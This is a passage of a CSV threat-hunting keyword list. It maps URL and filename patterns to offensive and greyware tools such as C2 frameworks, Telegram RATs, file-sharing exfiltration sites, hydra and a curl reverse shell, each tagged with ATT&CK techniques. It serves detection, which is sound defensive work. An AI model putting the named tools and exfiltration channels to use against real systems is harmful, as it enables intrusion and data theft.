+"*https://anonfiles.com/*/*","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://anymailfinder.com/search/*","greyware_tool_keyword","anymailfinder","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://anymailfinder.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://api.anonfiles.com/upload*","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://api.dropboxapi.com/*","greyware_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","Dropbox API calls - Understanding your environment with the applications used
and allowed will enhances the effectiveness of your hunt here","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*https://api.hunter.io/*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","1","N/A","N/A","10","N/A","N/A","N/A","N/A"
+"*https://api.openai.com/v1/files*","greyware_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","0","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*https://api.telegram.org/bot*/sendMessage*","greyware_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z"
+"*https://avred.r00ted.ch/upload*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*https://bashupload.com*","greyware_tool_keyword","bashupload.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data
Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://crackstation.net/*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z"
+"*https://curlshell:* | bash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z"
+"*https://cyseclabs.com/exploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*https://dnsdumpster.com/*","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*https://download.advanced-ip-scanner.com/download/files/*.exe*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off.
It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://ffuf.io.fi*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*https://ffuf.io/FUZZ*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*https://file.io/*","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://file.io/?title=*","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://github.com/bitsadmin/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell
logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*https://github-com.translate.goog/*","greyware_tool_keyword","translate.goog","accessing github through google translate (evasion) false positive risk","T1090.003","TA0005","N/A","N/A","Defense Evasion","https://*-com.translate.goog/*","0","1","N/A","1","3","N/A","N/A","N/A","N/A"
+"*https://gitlab.com/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://hunter.io/*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://ipv4.myip.wtf/text*","greyware_tool_keyword","ipv4.myip.wtf","get public ip address.
Used by disctopia-c2","T1016 - T1071.001","TA0005 - TA0002","N/A","N/A","Reconnaissance","https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py","1","1","greyware_tools high risks of false positives","N/A","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z"
+"*https://kali.download/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://localhost:7443/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 -
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*https://matrix.org/_matrix/client/r0/rooms/*/send/m.room.message*","greyware_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","0","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z"
+"*https://myexternalip.com/raw*","greyware_tool_keyword","myexternalip.com","return external ip address","T1046 - T1595 - T1595.001","TA0007 - TA0040","N/A","N/A","Reconnaissance","https://myexternalip.com/raw","1","1","False positives warning - used by some C2 projects but legitimate site","1","6","N/A","N/A","N/A","N/A"
+"*https://pastebin.com/raw/fevFJe98*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*https://t.me/BotFather*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z"
+"*https://t.me/machine1337*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z"
+"*https://temp.sh/*/*","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the
negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://temp.sh/upload*","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://tempsend.com/*","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://tempsend.com/send*","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*https://textbin.net/raw/*","greyware_tool_keyword","textbin.net","textbin.net raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","textbin.net","1","1","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
+"*https://tmpfiles.org/dl/*.exe*","greyware_tool_keyword","tmpfiles.org","download of an executable files from tmpfiles.org often used by
ransomware groups","T1566.002 - T1192 - T1105","TA0001 - TA0002","N/A","N/A","Collection","N/A","1","1","greyware tool - risk of false positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://transfer.sh*","greyware_tool_keyword","transfer.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://transfert-my-files.com/files/*","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://transfert-my-files.com/inc/upload.php*","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://we.tl/t-*","greyware_tool_keyword","wetransfer","WeTransfer is a popular file sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","greyware tool - risks of False positive 
!","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://web.archive.org/*https://www.kernel-exploits.com/media/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*https://wetransfer.com/api/v4/transfers/*","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://wetransfer.com/downloads/*","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://wfuzz.readthedocs.io*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*https://www.email-format.com/d/*","greyware_tool_keyword","email-format","used by attackers to find informations about a company users","T1593 - T1596 - 
T1213","TA0009","N/A","N/A","Reconnaissance","https://www.email-format.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.myget.org/F/fireeye/api/v2*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*https://www.nirsoft.net/toolsdownload/*","greyware_tool_keyword","nirsoft tools","NirSoft is a legitimate software company that develops system utilities for Windows. Some of its tools can be used by malicious actors to recover passwords harvest sensitive information and conduct password attacks.","T1003 - T1003.001 - T1003.002 - T1110 - T1566","TA0002 - TA0003 - TA0004 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Collection","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/toolsdownload/*.exe*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/toolsdownload/*.zip*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/utils/*.exe*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be 
abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/utils/*.zip*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.skymem.info/srch?q=*","greyware_tool_keyword","skymen.info","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.skymem.info","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https_revshell.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*httpsmuggler.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*https-portal*","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. 
you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4210","288","2023-01-29T14:55:41Z","2015-12-14T20:09:04Z" +"*'http-stager'*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*huan.exe *.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*Huan.sln*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*Huan.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*HuanLoader.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*hub.docker.com/u/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HunnicCyber/SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*HVNC Server.exe*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HVNC\ Server*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * ftp://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * http-post-form *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * mysql://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * ssh://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * telnet://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to 
attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra smtp-enum*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra.c*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra:x:10001:*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*HYDRA_PROXY_HTTP*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 